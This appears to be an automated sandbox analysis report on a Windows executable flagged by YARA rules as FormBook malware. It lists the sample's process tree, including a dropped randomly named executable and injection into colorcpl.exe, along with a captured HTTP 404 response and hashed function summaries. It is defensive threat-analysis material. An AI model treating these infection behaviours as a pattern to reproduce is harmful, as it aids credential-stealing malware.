65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>10

Target ID:	0
Start time:	05:24:51
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\18in SPA-198-2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\18in SPA-198-2024.exe"
Imagebase:	0x150000
File size:	858'624 bytes
MD5 hash:	9CA6EE6DDA005563C3D04249C85188E7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:24:53
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\18in SPA-198-2024.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\18in SPA-198-2024.exe"
Imagebase:	0x150000
File size:	858'624 bytes
MD5 hash:	9CA6EE6DDA005563C3D04249C85188E7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:24:54
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\18in SPA-198-2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\18in SPA-198-2024.exe"
Imagebase:	0x6f0000
File size:	858'624 bytes
MD5 hash:	9CA6EE6DDA005563C3D04249C85188E7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2248027115.0000000001130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2249648463.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:25:06
Start date:	31/10/2024
Path:	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe"
Imagebase:	0xe50000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4472773196.0000000004020000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	05:25:09
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\colorcpl.exe"
Imagebase:	0x850000
File size:	86'528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4472767569.0000000005070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4472840073.00000000050C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	05:25:22
Start date:	31/10/2024
Path:	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe"
Imagebase:	0xe50000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4474644674.0000000005800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	05:25:35
Start date:	31/10/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	12.1%
Total number of Nodes:	66
Total number of Limit Nodes:	8

Executed Functions

Function 088B0378 Relevance: 6.9, Strings: 5, Instructions: 616
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hnq, xrefs: 088B0B9B
Hnq, xrefs: 088B09CC
Hnq, xrefs: 088B0939
Hnq, xrefs: 088B0ADD
Hnq, xrefs: 088B0A53

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: Hnq$Hnq$Hnq$Hnq$Hnq
API String ID: 0-1196166627
Opcode ID: 495af24f279f96ce5ff928f6c0e1a23364b374c9390c6638afe8833a6949ef88
Instruction ID: 8b4990eafd4c17fd94c955fe672f1ac7e07f9cdef88b89a98844a7d750e5d6de
Opcode Fuzzy Hash: 495af24f279f96ce5ff928f6c0e1a23364b374c9390c6638afe8833a6949ef88
Instruction Fuzzy Hash: 11327C70A006588FDB54DFA9C9507AEBBF2AFC8301F1481A9D409EB395DB349D86CB91

Function 088B7868 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 616381af7f5c2c1db65dc1769584aedb0786fa1b0398230ceb11c9c4bece7d39
Instruction ID: ec14de1e85150c962c5522b84f834fe58357942d393550f2b784404612e0a3e2
Opcode Fuzzy Hash: 616381af7f5c2c1db65dc1769584aedb0786fa1b0398230ceb11c9c4bece7d39
Instruction Fuzzy Hash: 6642A174E11219CFDB14DFA9C984BDDBBB2BF88301F1491A9E809A7355DB34AA81CF50

Function 088B6190 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb865f3d0d64b60378a191ef9df082fb1324b9027871218f02aededf94a8db5d
Instruction ID: 7cd45e3bcebd31b48dd40473352f3173a34184c0e2bc000689aba07fddd38930
Opcode Fuzzy Hash: fb865f3d0d64b60378a191ef9df082fb1324b9027871218f02aededf94a8db5d
Instruction Fuzzy Hash: 4F32C370901219CFDB54DF99C584A8EFBB2BF88312F55D1A9D448AB612DB30E985CFA0

Function 088B0369 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a62baa679b18863409d9d6a0d02152f86c6ecfef28bc84196f587b6ab84d789
Instruction ID: d704dfbd55e7154bce16d25b5b1368825e09fcf94ff00db276b9180ea2185cf5
Opcode Fuzzy Hash: 5a62baa679b18863409d9d6a0d02152f86c6ecfef28bc84196f587b6ab84d789
Instruction Fuzzy Hash: E8C13971E006188FDB14DFA9C8807DEBBB2AF88315F14C5AAD449AB365DB70E985CF50

Function 088B7859 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88053390e0da611aaa80c2e1adf114934613ce54a7af7c2b591ad51b53f14d2d
Instruction ID: 0d5e07b89824d56849f81f6621879070a5536ea918b9452e0e3db2a9694e5f0a
Opcode Fuzzy Hash: 88053390e0da611aaa80c2e1adf114934613ce54a7af7c2b591ad51b53f14d2d
Instruction Fuzzy Hash: 3961B274E01218CFDB18CFAAC984BDDBBB2BF88301F1481AAE809A7355DB359941CF54

Function 088BA8B0 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb22be9fc27d19885cc85b5f8abf315efb573f61c465f894c389b3322dde2762
Instruction ID: b58e2825ceef0ca8ff7ff1169e8d1f7708c717666fd626ba067a4456551f9983
Opcode Fuzzy Hash: eb22be9fc27d19885cc85b5f8abf315efb573f61c465f894c389b3322dde2762
Instruction Fuzzy Hash: 14517F75D016199FDF08CFEAD9446EEBBB2FF89301F10802AE919AB254DB345A46CF50

Function 088B6181 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04ae396c005e8eae7e2b873e1d02d2e019ef0c485cbfaa756d0ae360deb6c1fc
Instruction ID: 76f7c6f3e9c433fd0aa66d61fafbb71f2d1345cc1f21ef30d435b820f4940b50
Opcode Fuzzy Hash: 04ae396c005e8eae7e2b873e1d02d2e019ef0c485cbfaa756d0ae360deb6c1fc
Instruction Fuzzy Hash: 0F41D771E006188FEB58CFAAC9417DEBBB2BFC8300F14C0AAD558A7255EB344A858F51

Function 088BA8A0 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e0e367612ac52574ae24e6c1b91287fbaaa7c816e5193b5d69fec589c7d5051
Instruction ID: 7bea731268c13137beb098b5e5605000e3d629c751dd5054bd3247e812f70728
Opcode Fuzzy Hash: 9e0e367612ac52574ae24e6c1b91287fbaaa7c816e5193b5d69fec589c7d5051
Instruction Fuzzy Hash: 1141AFB5E046199FDB08CFAAC9846EEFBF2AF88301F14C06AD418AB355DB345946CF50

Function 00B4D288 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B4D316
GetCurrentThread.KERNEL32 ref: 00B4D353
GetCurrentProcess.KERNEL32 ref: 00B4D390
GetCurrentThreadId.KERNEL32 ref: 00B4D3E9

Memory Dump Source

Source File: 00000000.00000002.2037239609.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_18in SPA-198-2024.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8c1db0c16cd4c604d1e6d9ab79ed7ad2caa85cfe965bf2099a4a8d2b7a1ab3b6
Instruction ID: d8cfef80f203790de1489ac6bbaffa688d9b1b18e1f3429bf182b88d81be7388
Opcode Fuzzy Hash: 8c1db0c16cd4c604d1e6d9ab79ed7ad2caa85cfe965bf2099a4a8d2b7a1ab3b6
Instruction Fuzzy Hash: D45158B09003498FDB14DFA9D548BAEBBF1EF49304F248459E009A73A0D778A985CF66

Function 00B4D298 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B4D316
GetCurrentThread.KERNEL32 ref: 00B4D353
GetCurrentProcess.KERNEL32 ref: 00B4D390
GetCurrentThreadId.KERNEL32 ref: 00B4D3E9

Memory Dump Source

Source File: 00000000.00000002.2037239609.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_18in SPA-198-2024.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8e6193bef3ea914fc9f52f27d20b59f46280395967e16137e9fc2a852c31b470
Instruction ID: b2962341987e7051923c32821294420ac5f93389f3aaa6ce52f242bad57f4228
Opcode Fuzzy Hash: 8e6193bef3ea914fc9f52f27d20b59f46280395967e16137e9fc2a852c31b470
Instruction Fuzzy Hash: 3E5159B09003098FDB14DFAAD548BAEBBF5FF49304F208459E009A73A0D778A945CF66

Function 00B4AED9 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B4B13E

Memory Dump Source

Source File: 00000000.00000002.2037239609.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_18in SPA-198-2024.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5dfc5f2a2113c9b48e8a83505caaa063d3b24b1b182560ca0bd0def795122680
Instruction ID: af8f7acacea30cfc17bdae767e21b510f6ec4cef8e04acd8d684d1a4ff3bd3fe
Opcode Fuzzy Hash: 5dfc5f2a2113c9b48e8a83505caaa063d3b24b1b182560ca0bd0def795122680
Instruction Fuzzy Hash: 9F8158B0A00B448FDB24DF2AD454B5ABBF1FF48310F008A6DE45AD7A50D735EA4ACB91

Function 00B458EC Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B459A9

Memory Dump Source

Source File: 00000000.00000002.2037239609.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_18in SPA-198-2024.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 07ae8cc048a595331d8cd1285d532770d4ed8ef2f6ae3c0ffa4e08a39a6c71be
Instruction ID: 2ca079130b2495ff75dcc31ab5b03597546836b03ae101c2e10d95b582f8d275
Opcode Fuzzy Hash: 07ae8cc048a595331d8cd1285d532770d4ed8ef2f6ae3c0ffa4e08a39a6c71be
Instruction Fuzzy Hash: EA41F1B0C00B19CFDB24CFA9C984ADDBBF2BF49304F20806AD418AB295DB756946CF50

Function 00B444D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B459A9

Memory Dump Source

Source File: 00000000.00000002.2037239609.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_18in SPA-198-2024.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 623a8db0b5f0c6206cce95f278e84f5fe1efa010b7d4013f4a76d71ca058a28b
Instruction ID: fda71e18d3a7032b49b72bdd2759775ee16fc2442f4f9550e60927b32a303a74
Opcode Fuzzy Hash: 623a8db0b5f0c6206cce95f278e84f5fe1efa010b7d4013f4a76d71ca058a28b
Instruction Fuzzy Hash: 7641D0B0C00B1DCBDB24DFA9C884A9EBBF5BF49304F20816AD418AB295DB756945CF90

Function 088B0CA0 Relevance: 1.6, APIs: 1, Instructions: 83
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 088B0D5F

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 115830accb1c41db710a52b3810c94fd806b1c6bd7518d236ea3cb61229ab402
Instruction ID: bd784e2c829153463e06a4732b382f9a6bdecf9ca55b2de154253c7e2abc5dd9
Opcode Fuzzy Hash: 115830accb1c41db710a52b3810c94fd806b1c6bd7518d236ea3cb61229ab402
Instruction Fuzzy Hash: 113189728043889FCB11DFA9C804AEEBFF8EF49311F14805AE954A7261C335E954DFA1

Function 00B4D4D8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B4D567

Memory Dump Source

Source File: 00000000.00000002.2037239609.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_18in SPA-198-2024.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a94db2a5863fdfd11a1764f9c9ab6662bc1066ebe558cb5c439eaf00ad9080a4
Instruction ID: 6f8e825dc6def933ece1ae0f055c40dada3f01f9a452f81c9bac3fda06084df0
Opcode Fuzzy Hash: a94db2a5863fdfd11a1764f9c9ab6662bc1066ebe558cb5c439eaf00ad9080a4
Instruction Fuzzy Hash: 9D21E4B5900248DFDB10CFAAD584ADEBFF5FB48314F14845AE958A7310C378AA45CFA1

Function 088B3920 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 088B399F

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID: FromMonitorPoint
String ID:
API String ID: 1566494148-0
Opcode ID: d4f0ffc5cbe99647b4b19acafd7e31a2875b5a6518ff3caa49139bde7cac882b
Instruction ID: 61106680e7eb1c395bc24bbca14711fd2bdd927c364bd5e3242c0cfccd7422ce
Opcode Fuzzy Hash: d4f0ffc5cbe99647b4b19acafd7e31a2875b5a6518ff3caa49139bde7cac882b
Instruction Fuzzy Hash: D0218C75A002489FDB10DF9AD409BEEBBF5EB89310F108419E995B7780C734A908CFA1

Function 00B4D4E0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B4D567

Memory Dump Source

Source File: 00000000.00000002.2037239609.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_18in SPA-198-2024.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7608f464e9778bc6aabcf067ce77523a70027810054b35f3ce4efbfc118ccb1b
Instruction ID: e648f0f6f026d74b7ccfe9da377ffb0bf57a8a45a185036a57c2e67dbb6d9835
Opcode Fuzzy Hash: 7608f464e9778bc6aabcf067ce77523a70027810054b35f3ce4efbfc118ccb1b
Instruction Fuzzy Hash: B621E4B59002089FDB10CFAAD584ADEBFF8FB48310F14845AE918A3310C378A940CFA1

Function 088B3910 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 088B399F

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID: FromMonitorPoint
String ID:
API String ID: 1566494148-0
Opcode ID: 5ce5a3d06d753720dc96f7286430566bc69b2acd45eef86d1e38edf7ed58731e
Instruction ID: de04759976e198c263492294e57591b54d66f728591d6c1d1c46ee126f566125
Opcode Fuzzy Hash: 5ce5a3d06d753720dc96f7286430566bc69b2acd45eef86d1e38edf7ed58731e
Instruction Fuzzy Hash: 2A219AB59042499FCB10DF96C408BEEBBF0EB49310F10805AE995A7781C738A948CFA1

Function 00B4B0D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B4B13E

Memory Dump Source

Source File: 00000000.00000002.2037239609.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_18in SPA-198-2024.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7d672791af0316bff89bea305c9d8f9600f4614325ab627946a17ed3a9b5da03
Instruction ID: 62a1357856276156da80648e13b2219e0b206b625f4f8867b3818078771cb479
Opcode Fuzzy Hash: 7d672791af0316bff89bea305c9d8f9600f4614325ab627946a17ed3a9b5da03
Instruction Fuzzy Hash: 3F11DFB6C002498FDB14DF9AD848A9EFBF4EB88314F10845AD529B7210C379A645CFA1

Function 088B1F48 Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,088B28D9,?,?), ref: 088B2A80

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 621bcb634aabb5a44edb049e51fed4afcd607a62bb18c862a2e0489620e06439
Instruction ID: 39ce875b1c0f720c690eab497a6df7d1ef3b9a90b3947e06e9b2ebe92e9d8097
Opcode Fuzzy Hash: 621bcb634aabb5a44edb049e51fed4afcd607a62bb18c862a2e0489620e06439
Instruction Fuzzy Hash: 1B1134B18043498FCB20DFAAC585BEEBBF4EF59324F10845AD558A7350D738A944CFA5

Function 088B2A21 Relevance: 1.3, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,088B28D9,?,?), ref: 088B2A80

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: af124d65d13327dda72c63acba36d19ae1323df60070a8529cf3a87c5bff0438
Instruction ID: 4ea720b1dd03d3971720fcb3e276f9d05db6f39347621cc17cbaa7c9c81a1cb3
Opcode Fuzzy Hash: af124d65d13327dda72c63acba36d19ae1323df60070a8529cf3a87c5bff0438
Instruction Fuzzy Hash: 1A1183B68007498FCB20CF99C584BEEBBF0EB88320F11845AD568A7341C338A544CFA1

Function 088B1F54 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,088B28D9,?,?), ref: 088B2A80

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: fdc352284d87f06f5bd8acb34a5313633e1de7d8792af09594c9f0fee52d754e
Instruction ID: bf9ba5247c7058994e6a0914d9007cfe0f086458a897acec852996b933b94ab1
Opcode Fuzzy Hash: fdc352284d87f06f5bd8acb34a5313633e1de7d8792af09594c9f0fee52d754e
Instruction Fuzzy Hash: C11125B18003498FDB20DF9AC544BEEBBF4EB48324F108459E558A7341D739A944CFA5

Function 00AED4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037093480.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aed000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d48037428085e2380f4252d80a0ca5e47683897dc106e3c1134b6be187a9473d
Instruction ID: 5f8dbdba93081fefe3a6aac4208669e549a6e06f9b848420820181c4f37dcb4b
Opcode Fuzzy Hash: d48037428085e2380f4252d80a0ca5e47683897dc106e3c1134b6be187a9473d
Instruction Fuzzy Hash: A0212272500280EFCB05DF14D9C0F26BF65FB98318F20C569E9090B256C33AD816DBB2

Function 00AED3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037093480.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aed000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a565b70da0e65385728c6dcd6259a3a38470a08d15252e748cff7f1c793fb06
Instruction ID: f527aff135419cff3b200288b5314713986ee85b78d2b7ecb246596b2cd3c74e
Opcode Fuzzy Hash: 0a565b70da0e65385728c6dcd6259a3a38470a08d15252e748cff7f1c793fb06
Instruction Fuzzy Hash: C9213775500284DFDB05DF14D9C0F26BFA5FBA8324F20C569E9090F296C33AE856DBA2

Function 00AFD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037131496.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_afd000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcca7fe489fcbdc66245249c8778f88b18e5e3c297868633c5918c0ce5471f2b
Instruction ID: fbb4ece8f873ec8b8ad0a2ad2848689d64909036d96f8a747d05067841c0a48a
Opcode Fuzzy Hash: bcca7fe489fcbdc66245249c8778f88b18e5e3c297868633c5918c0ce5471f2b
Instruction Fuzzy Hash: 0821F571504208DFDB16DF64D584B26BF66FB84314F20C569EA4A4B356CB3AD807CA61

Function 00AFD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

